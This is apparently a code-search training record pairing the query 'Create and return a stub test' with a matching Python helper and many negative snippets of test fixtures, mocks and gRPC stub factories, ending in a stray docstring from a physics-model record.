[ "0.71334535", "0.71291125", "0.6881836", "0.6608917", "0.634653", "0.61560285", "0.5989048", "0.5923213", "0.5881174", "0.5840506", "0.58325845", "0.5785326", "0.5723227", "0.57039267", "0.5621444", "0.55563307", "0.5549682", "0.5542596", "0.55241853", "0.53976136", "0.5350896", "0.5350116", "0.533966", "0.5335079", "0.52759075", "0.5272946", "0.52468634", "0.52365065", "0.5229169", "0.5224481", "0.5223818", "0.5203205", "0.520289", "0.518581", "0.5166878", "0.5152012", "0.51458955", "0.51417", "0.51411057", "0.5128586", "0.51193786", "0.5115262", "0.510474", "0.50986403", "0.5087352", "0.50826067", "0.50749815", "0.50748616", "0.50689936", "0.5065001", "0.50566554", "0.50499094", "0.50491774", "0.5048958", "0.5046168", "0.50415003", "0.5028072", "0.50280166", "0.5025696", "0.5009525", "0.49841237", "0.49556243", "0.49411407", "0.4929591", "0.4914255", "0.49119204", "0.48874325", "0.488485", "0.4884647", "0.4883122", "0.48719546", "0.487013", "0.4857894", "0.485098", "0.4850586", "0.48491925", "0.48485124", "0.48463067", "0.48447064", "0.48441178", "0.48439765", "0.48394516", "0.48360398", "0.48353642", "0.48342377", "0.48329335", "0.48269716", "0.48256394", "0.48256394", "0.48117694", "0.4811469", "0.4811386", "0.4809421", "0.480043", "0.47996414", "0.47960284", "0.47940275", "0.47869623", "0.47850448", "0.47844353" ]
0.5575173
15
Create and return a stub test.
def CreateStubTest(phases=None): # pylint: disable=invalid-name test_metadata = phase_data.TestMetadata('foo') return phase_data.phase_data(test_metadata, phases or [])
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def CreateStubTest(phases=None, params=None): # pylint: disable=invalid-name\n test_metadata = htftest.TestMetadata('foo')\n # pylint: disable=protected-access\n if params is not None:\n test_metadata._parameter_list = (\n parameters.TestParameterList(params.parameters))\n return htftest.HTFTest(test_metadata, phases or [])", "def test_stub(self):\n pass", "def create_stub(cls, proto_py_module, stub_name):\n\n return cls.create_stubs(proto_py_module, stub_name)", "def test_stub() -> None:\n test_val = 3\n assert test_val == 3", "def make_test_object(self):\n return self.orm_cls.testing_create()", "def test_new(self):", "def test_new(self):", "def create_instance(test_id, config, args):\n return TestT1Detail(test_id, config, args)", "def test_create(api: API):\n api.user.create.return_value = 123456\n account = Account(api, \"USERNAME\", \"PASSWORD\")\n api.user.create.assert_called_once()\n assert account.create()", "def create_test_node():\n node = cmds.createNode(\"unknown\")\n _add_test_attrs_to_node(node)\n return node", "def create_stubs(cls, proto_py_module, *stub_names):\n\n return cls(proto_py_module, *stub_names).stubs", "def make_shell_test(name):\n test = Test(name)\n test.add_step(\"run\", step_run, checks=[\n check_retcode_zero,\n create_check_reference_output(name+\".ref\"),\n ], allow_retries=3)\n return test", "def _new(self):\n return self.lib.iperf_new_test()", "def test_dummy():", "def file_factory(test_workspace):\n\n return FileCreator(test_workspace)", "def test_create_run(self):\n pass", "def create_test_service(context, **kw):\n service = get_test_service(context, **kw)\n service.create()\n return service", "def generate_test_method(test_name):\n\n def run_test(self):\n # backup any existing files with our expected output_name\n output_name = \"{}.png\".format(test_name)\n backup_name = output_name + \".backup\"\n if os.path.isfile(output_name):\n os.rename(output_name, backup_name)\n self.addCleanup(cleanup_backup, backup_name, output_name)\n\n # run the test\n ret = subprocess.call(\"python {}.py\".format(test_name), shell=True)\n self.assertEqual(ret, 0)\n\n output_exists = os.path.isfile(output_name)\n if output_exists:\n self.addCleanup(cleanup_output, output_name)\n\n ps_output_name = \"{}.ps\".format(test_name)\n if os.path.isfile(ps_output_name):\n # some tests may also generate postscript files which need to be deleted\n self.addCleanup(cleanup_output, ps_output_name)\n\n self.assertTrue(output_exists)\n\n return run_test", "def test_dummy_test():\n pass", "def test_create(self):\n pass", "def create_mock_api_factory(cls):\n mock_api, mock_scheduler_client = cls.create_mock_api()\n mock_api_factory = Mock()\n mock_api_factory.return_value = mock_api\n return mock_api_factory, mock_scheduler_client", "def beta_create_GNMITest_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('gnmitest.GNMITest', 'Run'): github_dot_com_dot_openconfig_dot_gnmitest_dot_proto_dot_suite_dot_suite__pb2.Suite.SerializeToString,\n }\n response_deserializers = {\n ('gnmitest.GNMITest', 'Run'): github_dot_com_dot_openconfig_dot_gnmitest_dot_proto_dot_report_dot_report__pb2.Report.FromString,\n }\n cardinalities = {\n 'Run': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'gnmitest.GNMITest', cardinalities, options=stub_options)", "def test_create10(self):\n pass", "def _create_stub(target, port):\n channel = gnmi_pb2_grpc.grpc.insecure_channel(target + ':' + port)\n return gnmi_pb2_grpc.gNMIStub(channel)", "def create_access_test(fullpath):\n try:\n verify_test_exists(fullpath)\n except:\n add_test(fullpath)\n access_test(fullpath)", "def test_create(session, client, jwt, desc, json_data, roles, status, has_account):\n current_app.config.update(PAYMENT_SVC_URL=MOCK_PAY_URL)\n current_app.config.update(AUTH_SVC_URL=MOCK_URL_NO_KEY)\n headers = None\n # setup\n if has_account and BCOL_HELP in roles:\n headers = create_header_account(jwt, roles, 'test-user', BCOL_HELP)\n elif has_account and GOV_ACCOUNT_ROLE in roles:\n headers = create_header_account(jwt, roles, 'test-user', '1234')\n elif has_account:\n headers = create_header_account(jwt, roles)\n else:\n headers = create_header(jwt, roles)\n\n # test\n response = client.post('/api/v1/financing-statements',\n json=json_data,\n headers=headers,\n content_type='application/json')\n\n # check\n assert response.status_code == status\n if response.status_code == HTTPStatus.CREATED:\n registration: Registration = Registration.find_by_registration_number(response.json['baseRegistrationNumber'],\n 'PS12345', True)\n assert registration.verification_report", "def createMakingTest(tx, query, personId, testId, date, hour, result):\n tx.run(query, personId=personId, testId=testId, date=date, hour=hour, result=result)", "def create_test_goal(context, **kw):\n goal = get_test_goal(context, **kw)\n goal.create()\n return goal", "def __new__(cls, name, func_call, expect_dir=None, expect_base=None,\n ext='json', covers=None, breakpoints=None, break_funcs=()):\n breakpoints = breakpoints or []\n if not breakpoints or break_funcs:\n for f in break_funcs or (func_call.func,):\n if hasattr(f, 'im_func'):\n f = f.im_func\n breakpoints.append((f.func_code.co_filename,\n f.func_code.co_firstlineno,\n f.func_code.co_name))\n\n expect_dir = expect_dir.rstrip('/')\n return super(Test, cls).__new__(cls, name, func_call, expect_dir,\n expect_base, ext, covers, breakpoints)", "def Generatable(cls):\n if hasattr(cls, 'generate_tests') and callable(cls.generate_tests):\n def create_test_func(name, test_func):\n setattr(cls, 'test_' + name.replace(' ', '_').lower(), test_func)\n cls.generate_tests(create_test_func)\n return cls", "def test_create(self):\n self.app\n pass", "def test_method_creation():\n my_method = SGMethod(\"Test\")\n \n assert my_method.name == \"Test\"\n assert len(my_method.params) == 0\n assert my_method.return_type == None", "def instantiate_for_expectation(self, testcase):\n raise PlaceHolderException('Subclass should implement this function.')", "def stub_init(self, *args, **kwargs):\n self.data = ReturnValueStub()\n self.data.name = self.__class__.__name__\n self.name = self.data.name\n self.set_stub_resources()", "def make_suite():\n suite = unittest.TestSuite()\n return suite", "def test__call__(self):\n mock = Mock()\n factory = Factory(mock)\n factory()\n mock.assert_called_once_with()", "def test_create(self):\n path = self.tmp_py()\n # Creating a file that doesn't exist should succeed\n self.cls.create(path)\n self.assertTrue(os.path.exists(path))\n # Created file should be a valid script (If not, raises an error)\n self.cls.verify(path)\n # Can't create it again: it already exists\n self.assertRaises(exceptions.PathFoundError,self.cls.create,path)", "def create_test_instance(cls, **kwargs):\n # create a instance with random parameters\n obj = super(LibraryBinaryNumeric, cls).create_test_instance(**kwargs)\n # choose an optimal interaction matrix\n obj.choose_sensitivity_matrix('auto')\n return obj", "def create_test_port(**kw):\n port = get_test_port(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del port['id']\n dbapi = db_api.get_instance()\n return dbapi.create_port(port)", "def testClone(self):\n stub = MockStub()\n deadline = 1.0\n rpc = apiproxy_rpc.RPC(stub=stub, deadline=deadline)\n\n\n rpc_clone = rpc.Clone()\n self.assertEqual(rpc_clone.deadline, rpc.deadline)\n self.assertNotEqual(rpc_clone.MakeCall, rpc.MakeCall)", "def test_let(self):", "def get_blueprint_tester(client, blueprint_dir):\n sys.path.append(blueprint_dir)\n fixture = importlib.import_module(\"blueprint_fixture\")\n return fixture.BlueprintTest(client)", "def create_test_wallet_1(sequence):\n private_key = get_private_key_from_mnemonic(\n \"slot live best metal mandate page hover tank bronze code \" \\\n \"salad hill hen salad train inmate autumn nut home city \" \\\n \"shield level board measure\"\n )\n\n # get wallet\n wallet = Wallet(private_key, BinanceNetwork.TEST)\n\n # mock waller info\n wallet.account_number = 0\n wallet.sequence = sequence\n wallet.chain_id = \"test-chain-n4b735\"\n\n # double check to make sure wallet is valid\n assert wallet.address == \"tbnb12n2p6zcvgcpumyexqhnp3q9tc2327l39ycfnyk\"\n\n return wallet", "def create_model(self):\n self.skipTest(\"Base module should not be tested.\")", "def to_stub(self, name, description):\n if(not self._constructed): raise EGCSUnconstructedStateError()\n return EGStub(name, description, self._nbits, self._prime, \n self._generator)", "def test__init__(self):\n mocked_reconstructor = Mock()\n mocked_reconstructor.reconstruct.return_value = 'mocked'\n db_response = {'Item': {'test': True}}\n resp = GetResponse(db_response, mocked_reconstructor)\n assert resp.item == 'mocked'\n mocked_reconstructor.reconstruct.assert_called_with(db_response['Item'])", "def suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(CreateV1TestCase))\n suite.addTest(unittest.makeSuite(CreateV2TestCase))\n return suite", "def beta_create_Hetr_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('Hetr', 'BuildTransformer'): BuildRequest.SerializeToString,\n ('Hetr', 'Computation'): ComputationRequest.SerializeToString,\n ('Hetr', 'FeedInput'): FeedInputRequest.SerializeToString,\n ('Hetr', 'GetResults'): GetResultsRequest.SerializeToString,\n }\n response_deserializers = {\n ('Hetr', 'BuildTransformer'): BuildReply.FromString,\n ('Hetr', 'Computation'): ComputationReply.FromString,\n ('Hetr', 'FeedInput'): FeedInputReply.FromString,\n ('Hetr', 'GetResults'): GetResultsReply.FromString,\n }\n cardinalities = {\n 'BuildTransformer': cardinality.Cardinality.UNARY_UNARY,\n 'Computation': cardinality.Cardinality.UNARY_UNARY,\n 'FeedInput': cardinality.Cardinality.UNARY_UNARY,\n 'GetResults': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'Hetr', cardinalities, options=stub_options)", "def create_generic_testcase(created_days_ago=28):\n testcase = data_types.Testcase()\n\n # Add more values here as needed. Intended to be the bare minimum for what we\n # need to simulate a test case.\n testcase.absolute_path = '/a/b/c/test.html'\n testcase.crash_address = '0xdeadbeef'\n testcase.crash_revision = 1\n testcase.crash_state = 'crashy_function()'\n testcase.crash_stacktrace = testcase.crash_state\n testcase.crash_type = 'fake type'\n testcase.comments = 'Fuzzer: test'\n testcase.fuzzed_keys = 'abcd'\n testcase.minimized_keys = 'efgh'\n testcase.fuzzer_name = 'fuzzer1'\n testcase.open = True\n testcase.one_time_crasher_flag = False\n testcase.job_type = 'test_content_shell_drt'\n testcase.status = 'Processed'\n testcase.timestamp = CURRENT_TIME - datetime.timedelta(days=created_days_ago)\n testcase.project_name = 'project'\n testcase.platform = 'linux'\n testcase.put()\n\n return testcase", "def create_test_conductor(**kw):\n conductor = get_test_conductor(**kw)\n # Let DB generate ID if it isn't specified explicitly\n if 'id' not in kw:\n del conductor['id']\n dbapi = db_api.get_instance()\n return dbapi.register_conductor(conductor)", "def subscription_factory_fixture():\n def _factory(capability):\n sub = Subscription()\n sub.capability = capability\n return sub\n return _factory", "def test_request():\n return make_response(\"ok\")", "def test_0_0_create(self):\n\n self.assertTrue(self.b1)", "def create_test_strategy(context, **kw):\n strategy = get_test_strategy(context, **kw)\n strategy.create()\n return strategy", "def create_test_action(context, **kw):\n action = get_test_action(context, **kw)\n action.create()\n return action", "def test041_test_instantiation(self):\n with pytest.raises(NotImplementedError):\n example = _Example()", "def __init__(self, test_name=\"\"):\r\n unittest.TestCase.__init__(self, test_name)", "def test_handle_create(self):\n test_user = User(\"userid\")\n test_user.permissions_level = Permissions.admin\n test_user.github_username = \"githubuser\"\n self.db.retrieve.return_value = test_user\n self.gh.org_create_team.return_value = \"team_id\"\n inputstring = \"team create b-s --name 'B S'\"\n outputstring = \"New team created: b-s, name: B S, \"\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n inputstring += \" --platform web\"\n outputstring += \"platform: web, \"\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n self.gh.org_create_team.assert_called()\n self.gh.add_team_member.assert_called_with('githubuser', 'team_id')\n inputstring += \" --channel 'channelID'\"\n outputstring += \"added channel, \"\n self.sc.get_channel_users.return_value = ['someID', 'otherID']\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n self.sc.get_channel_users.assert_called_once_with(\"channelID\")\n self.db.retrieve.assert_called_with(User, 'otherID')\n self.gh.add_team_member.assert_called()\n inputstring += \" --lead 'someID'\"\n outputstring += \"added lead\"\n self.gh.has_team_member.return_value = False\n print(self.testcommand.handle(inputstring, user))\n self.assertTupleEqual(self.testcommand.handle(inputstring, user),\n (outputstring, 200))\n self.db.store.assert_called()", "def create_stub(self, iface, instance_id=None,\n endpoint=None, timeout=None, auth_key=None):\n if not iface or issubclass(iface, Descriptor):\n raise Exception(\"No iface given\")\n iface_name = iface.DESCRIPTOR.full_name\n self._logger.debug(\"Creating stub for %s\" % iface_name)\n if not auth_key:\n auth_key = self._auth_key\n return StubImpl(iface, instance_id, self._rca, endpoint, timeout, auth_key)", "def create_switch():\n connection = MagicMock()\n connection.address = 'addr'\n connection.port = 'port'\n connection.protocol.version = 0x04\n switch = Switch('00:00:00:00:00:00:00:01', connection)\n switch._enabled = True\n return switch", "def beta_create_RoutingInterface_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('routing.RoutingInterface', 'RoutingInterfaceGet'): RoutingInterfaceGetRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceInitialize'): RoutingInterfaceInitializeRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRefresh'): RoutingInterfaceNotificationRefreshRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRegister'): RoutingInterfaceNotificationRegisterRequest.SerializeToString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationUnregister'): RoutingInterfaceNotificationUnregisterRequest.SerializeToString,\n }\n response_deserializers = {\n ('routing.RoutingInterface', 'RoutingInterfaceGet'): RoutingInterfaceGetResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceInitialize'): RoutingInterfaceInitializeResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRefresh'): RoutingInterfaceNotificationRefreshResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationRegister'): RoutingInterfaceNotificationResponse.FromString,\n ('routing.RoutingInterface', 'RoutingInterfaceNotificationUnregister'): RoutingInterfaceNotificationUnregisterResponse.FromString,\n }\n cardinalities = {\n 'RoutingInterfaceGet': cardinality.Cardinality.UNARY_UNARY,\n 'RoutingInterfaceInitialize': cardinality.Cardinality.UNARY_UNARY,\n 'RoutingInterfaceNotificationRefresh': cardinality.Cardinality.UNARY_UNARY,\n 'RoutingInterfaceNotificationRegister': cardinality.Cardinality.UNARY_STREAM,\n 'RoutingInterfaceNotificationUnregister': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'routing.RoutingInterface', cardinalities, options=stub_options)", "def test_constructor(self):\n pass", "def createTestSuite():\n import tests.functional.tests as functional\n return unittest.TestLoader().loadTestsFromModule(functional)", "def test_user(self):\n factory_generated = UserFactory()\n print(factory_generated)\n\n assert factory_generated is not None\n # assert False, \"dumb assert to make PyTest print my stuff\"", "def test_stub(self):\n\n stub = google.appengine.api.apiproxy_stub_map.apiproxy.GetStub(\n 'websocket')\n\n self.assertEqual(\n typhoonae.websocket.websocket_stub.WebSocketServiceStub,\n stub.__class__)\n\n self.assertRaises(\n typhoonae.websocket.websocket_stub.ConfigurationError,\n stub._GetEnviron, 'unknown')", "def test_method(self):", "def construct_fake(self, name: str) -> ResponsibleFake:\n fake: NaiveFake = getattr(self.faker, name)\n return lru_cache(maxsize=None)(lambda _: fake())", "def make_test_instance(cls, extensions, namespace='TESTING',\r\n propagate_map_exceptions=False):\r\n\r\n o = cls.__new__(cls)\r\n o._init_attributes(namespace,\r\n propagate_map_exceptions=propagate_map_exceptions)\r\n o._init_plugins(extensions)\r\n return o", "def test_create_obj_by_type(self):\n test_obj = mock.MagicMock()\n returned_obj = self.tested_class._create_obj_by_type(test_obj)\n self.assertIs(returned_obj, test_obj)", "def test_do_create(create_resource: MagicMock, response: execution.ResponseInfo):\n create_resource.return_value = response\n bundle = MagicMock()\n bundle.resources.matching.return_value = [MagicMock(), MagicMock()]\n action = interface.CommandAction(MagicMock(), [], bundle)\n interface.do_create(action)\n assert create_resource.call_count == 2", "def test_single_test_case():\n pass", "def test_create_from_pear(self):\n pass", "def spec_tests():\n pass", "def beta_create_OpenconfigRpcApi_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('openconfig.OpenconfigRpcApi', 'Get'): GetRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'GetDataEncodings'): GetDataEncodingsRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'GetModels'): GetModelsRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'Set'): SetRequest.SerializeToString,\n ('openconfig.OpenconfigRpcApi', 'SetDataEncoding'): SetDataEncodingRequest.SerializeToString,\n }\n response_deserializers = {\n ('openconfig.OpenconfigRpcApi', 'Get'): GetResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'GetDataEncodings'): GetDataEncodingsResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'GetModels'): GetModelsResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'Set'): SetResponse.FromString,\n ('openconfig.OpenconfigRpcApi', 'SetDataEncoding'): SetDataEncodingResponse.FromString,\n }\n cardinalities = {\n 'Get': cardinality.Cardinality.UNARY_UNARY,\n 'GetDataEncodings': cardinality.Cardinality.UNARY_UNARY,\n 'GetModels': cardinality.Cardinality.UNARY_UNARY,\n 'Set': cardinality.Cardinality.UNARY_UNARY,\n 'SetDataEncoding': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers,\n response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'openconfig.OpenconfigRpcApi', cardinalities, options=stub_options)", "def test_client_create(self, mock_input, mock_pass):\n # Patch username and password.\n mock_input.return_value = \"user\"\n mock_pass.return_value = \"pass\"\n\n # Instantiate Agave object making reference to local mock server.\n local_uri = \"http://localhost:{port}/\".format(port=self.mock_server_port)\n ag = Agave(api_server=local_uri)\n\n # Create client.\n ag.clients_create(\"client-name\", \"some description\")\n\n assert ag.api_key == \"some api key\"\n assert ag.api_secret == \"some secret\"", "def test_05_resource_create(self, Mock):\r\n pkg_request = FakeRequest(json.dumps(self.pkg_json_found), 200,\r\n {'content-type': 'application/json'})\r\n\r\n rsrc_request = FakeRequest(json.dumps(\r\n self.pkg_json_found['result']['resources'][0]),\r\n 200,\r\n {'content-type': 'text/html'})\r\n Mock.return_value = pkg_request\r\n with self.flask_app.test_request_context('/'):\r\n # Resource that exists\r\n app = App(short_name='urbanpark', name='Urban Parks')\r\n user = User(fullname='Daniel Lombrana Gonzalez')\r\n self.ckan.package_create(app=app, user=user, url=\"http://something.com\")\r\n Mock.return_value = rsrc_request\r\n out = self.ckan.resource_create(name='task')\r\n err_msg = \"It should create the task resource\"\r\n assert out[\"id\"] == self.task_resource_id, err_msg\r\n Mock.return_value = self.server_error\r\n try:\r\n self.ckan.resource_create(name='something-goes-wrong')\r\n except Exception as out:\r\n type, msg, status_code = out.args\r\n assert \"Server Error\" in msg, msg\r\n assert 500 == status_code, status_code\r\n assert \"CKAN: the remote site failed! resource_create failed\" == type, type", "def test_create(client):\n rv = create(client, reponame='Michael', url='https://github.com/Michael')\n assert json.loads(rv.data.decode())['code'] == 0\n assert json.loads(rv.data.decode())['owner'] == 'Michael'\n assert json.loads(rv.data.decode())['url'] == 'https://github.com/Michael'", "def proto_test(test):\n if isinstance(test, ProtoTest):\n return test\n else:\n return ProtoTest(test)", "def test_1():", "async def _create_server_stub_pair(\n *interceptors: aio.ServerInterceptor,\n) -> Tuple[aio.Server, test_pb2_grpc.TestServiceStub]:\n server_target, server = await start_test_server(interceptors=interceptors)\n channel = aio.insecure_channel(server_target)\n return server, test_pb2_grpc.TestServiceStub(channel)", "def Cpp_test():\n pass", "def test():", "def test():", "def testpackage(tmpdir, version='0.1'):\n\n return create_testpackage(tmpdir, version=version)", "def create_mock_api(cls):\n mock_api = Mock(spec=HookedAuroraClientAPI)\n mock_scheduler = Mock()\n mock_scheduler.url = \"http://something_or_other\"\n mock_scheduler_client = Mock()\n mock_scheduler_client.scheduler.return_value = mock_scheduler\n mock_scheduler_client.url = \"http://something_or_other\"\n mock_api = Mock(spec=HookedAuroraClientAPI)\n mock_api.scheduler = mock_scheduler_client\n return (mock_api, mock_scheduler_client)", "def create_test(self, test_case, file_name):\n with open(os.path.join(self.tests, file_name), 'w+') as f:\n f.write(test_case)", "def make_uri_fixture(name):\n # noinspection PyShadowingNames\n def func(conn):\n return conn.createURI('ex://' + name)\n func.__name__ = name\n return pytest.fixture(func, name=name)", "def __test__():\n#-------------------------------------------------------------------------------\n import pylib.tester as tester\n return 0", "def test_create_scenario(self):\n pass", "def load_test_account() -> BankAccount:\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)", "def ToTestResourceObj(self):\n return TestResourceObj(\n name=self.name,\n url=self.default_download_url,\n test_resource_type=self.test_resource_type,\n decompress=self.decompress or False,\n decompress_dir=self.decompress_dir or '',\n mount_zip=self.mount_zip or False,\n params=TestResourceParameters.Clone(self.params))", "def test_something():", "def test():\n\t\treturn [\"vice.core.objects.tests\",\n\t\t\t[\n\t\t\t\tagb.test_agb_grid_constructor(),\n\t\t\t\tagb.test_agb_grid_destructor(),\n\t\t\t\tcallback_1arg.test_callback_1arg_constructor(),\n\t\t\t\tcallback_1arg.test_callback_1arg_destructor(),\n\t\t\t\tcallback_2arg.test_callback_2arg_constructor(),\n\t\t\t\tcallback_2arg.test_callback_2arg_destructor(),\n\t\t\t\tccsne.test_ccsne_yield_specs_constructor(),\n\t\t\t\tccsne.test_ccsne_yield_specs_destructor(),\n\t\t\t\tchannel.test_channel_constructor(),\n\t\t\t\tchannel.test_channel_destructor(),\n\t\t\t\telement.test_element_constructor(),\n\t\t\t\telement.test_element_destructor(),\n\t\t\t\tfromfile.test_fromfile_constructor(),\n\t\t\t\tfromfile.test_fromfile_destructor(),\n\t\t\t\thydrodiskstars.test_hydrodiskstars_constructor(),\n\t\t\t\thydrodiskstars.test_hydrodiskstars_destructor(),\n\t\t\t\timf.test_imf_constructor(),\n\t\t\t\timf.test_imf_destructor(),\n\t\t\t\tintegral.test_integral_constructor(),\n\t\t\t\tintegral.test_integral_destructor(),\n\t\t\t\tinterp_scheme_1d.test_interp_scheme_1d_constructor(),\n\t\t\t\tinterp_scheme_1d.test_interp_scheme_1d_destructor(),\n\t\t\t\tinterp_scheme_2d.test_interp_scheme_2d_constructor(),\n\t\t\t\tinterp_scheme_2d.test_interp_scheme_2d_destructor(),\n\t\t\t\tism.test_ism_constructor(),\n\t\t\t\tism.test_ism_destructor(),\n\t\t\t\tmdf.test_mdf_constructor(),\n\t\t\t\tmdf.test_mdf_destructor(),\n\t\t\t\tmigration.test_migration_constructor(),\n\t\t\t\tmigration.test_migration_destructor(),\n\t\t\t\tmultizone.test_multizone_constructor(),\n\t\t\t\tmultizone.test_multizone_destructor(),\n\t\t\t\tsinglezone.test_singlezone_constructor(),\n\t\t\t\tsinglezone.test_singlezone_destructor(),\n\t\t\t\tsneia.test_sneia_yield_specs_constructor(),\n\t\t\t\tsneia.test_sneia_yield_specs_destructor(),\n\t\t\t\tssp.test_ssp_constructor(),\n\t\t\t\tssp.test_ssp_destructor(),\n\t\t\t\ttracer.test_tracer_constructor(),\n\t\t\t\ttracer.test_tracer_destructor()\n\t\t\t]\n\t\t]", "def make_test_instance(cls, extensions, namespace='TESTING',\r\n propagate_map_exceptions=False):\r\n\r\n o = cls.__new__(cls)\r\n names = [e.name for e in extensions]\r\n o._init_attributes(namespace, names,\r\n propagate_map_exceptions=propagate_map_exceptions)\r\n o._init_plugins(extensions)\r\n return o", "def test_initialize_hypervisor(self, create_mock, libvirt_mock):\n resources = lxc.LXCResources('foo', {'domain': 'bar', 'hypervisor': 'baz'})\n libvirt_mock.open.assert_called_with('baz')\n create_mock.assert_called_with(resources.hypervisor, 'foo', 'bar', network_name=None)", "def test_10(self, test):\r\n return test.MANUAL()", "def create_test_node(**kw):\n node = get_test_node(**kw)\n # Let DB generate an ID if one isn't specified explicitly.\n # Creating a node with tags or traits will raise an exception. If tags or\n # traits are not specified explicitly just delete them.\n for field in {'id', 'tags', 'traits'}:\n if field not in kw:\n del node[field]\n dbapi = db_api.get_instance()\n return dbapi.create_node(node)", "def create_test_user():\n return User.objects.create(username='test_username', password='test_password')", "def beta_create_KratosService_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):\n request_serializers = {\n ('kratos.KratosService', 'AddRule'): AddRuleRequest.SerializeToString,\n ('kratos.KratosService', 'AddService'): AddServiceRequest.SerializeToString,\n ('kratos.KratosService', 'DeleteRule'): DeleteRuleRequest.SerializeToString,\n ('kratos.KratosService', 'DeleteService'): DeleteServiceRequest.SerializeToString,\n ('kratos.KratosService', 'ResetCounter'): ResetCounterRequest.SerializeToString,\n ('kratos.KratosService', 'Status'): StatusRequest.SerializeToString,\n }\n response_deserializers = {\n ('kratos.KratosService', 'AddRule'): AddRuleResponse.FromString,\n ('kratos.KratosService', 'AddService'): AddServiceResponse.FromString,\n ('kratos.KratosService', 'DeleteRule'): DeleteRuleResponse.FromString,\n ('kratos.KratosService', 'DeleteService'): DeleteServiceResponse.FromString,\n ('kratos.KratosService', 'ResetCounter'): ResetCounterResponse.FromString,\n ('kratos.KratosService', 'Status'): StatusResponse.FromString,\n }\n cardinalities = {\n 'AddRule': cardinality.Cardinality.UNARY_UNARY,\n 'AddService': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteRule': cardinality.Cardinality.UNARY_UNARY,\n 'DeleteService': cardinality.Cardinality.UNARY_UNARY,\n 'ResetCounter': cardinality.Cardinality.UNARY_UNARY,\n 'Status': cardinality.Cardinality.UNARY_UNARY,\n }\n stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)\n return beta_implementations.dynamic_stub(channel, 'kratos.KratosService', cardinalities, options=stub_options)", "def create_success(test, time):\n return _TestInfo(test, time)" ]
[ "0.74640894", "0.68726027", "0.65086746", "0.6226904", "0.59744567", "0.5875409", "0.5875409", "0.5869115", "0.5800327", "0.57175136", "0.5705263", "0.5691941", "0.5661378", "0.5658473", "0.5648882", "0.5639574", "0.5630987", "0.5609541", "0.55923575", "0.55062956", "0.5492857", "0.54765517", "0.5466594", "0.54480326", "0.5427351", "0.5409014", "0.5395724", "0.5383768", "0.53359103", "0.53072935", "0.5302184", "0.53010035", "0.5298375", "0.5296451", "0.5276808", "0.5272885", "0.5243893", "0.5227209", "0.5224465", "0.5221786", "0.5211996", "0.52026695", "0.519507", "0.5190788", "0.51872694", "0.5177702", "0.5175054", "0.5170886", "0.5169307", "0.5163448", "0.5161105", "0.5156539", "0.5155834", "0.5149371", "0.51434237", "0.5139249", "0.5135974", "0.51255053", "0.5124553", "0.5123119", "0.5114417", "0.5110398", "0.5104794", "0.50970143", "0.50869966", "0.50729084", "0.5068957", "0.50671834", "0.5064739", "0.5063914", "0.5059509", "0.50588727", "0.5050128", "0.5041992", "0.50401235", "0.5039517", "0.5037861", "0.50288594", "0.5028654", "0.5026903", "0.50261384", "0.502355", "0.502355", "0.50073075", "0.50065345", "0.4991152", "0.49864", "0.49743497", "0.49731818", "0.49719873", "0.49712515", "0.49682152", "0.49678838", "0.49637467", "0.49617383", "0.49591455", "0.4958782", "0.4958134", "0.4954969", "0.49531916" ]
0.7049483
1
Checks whether the parameters sent in the array param correspond to a physical model (i.e. if one of the minima are close to the Higgs v (experimentally verified) and if one of the masses correspond to the Higgs mass (exp. verified as well).
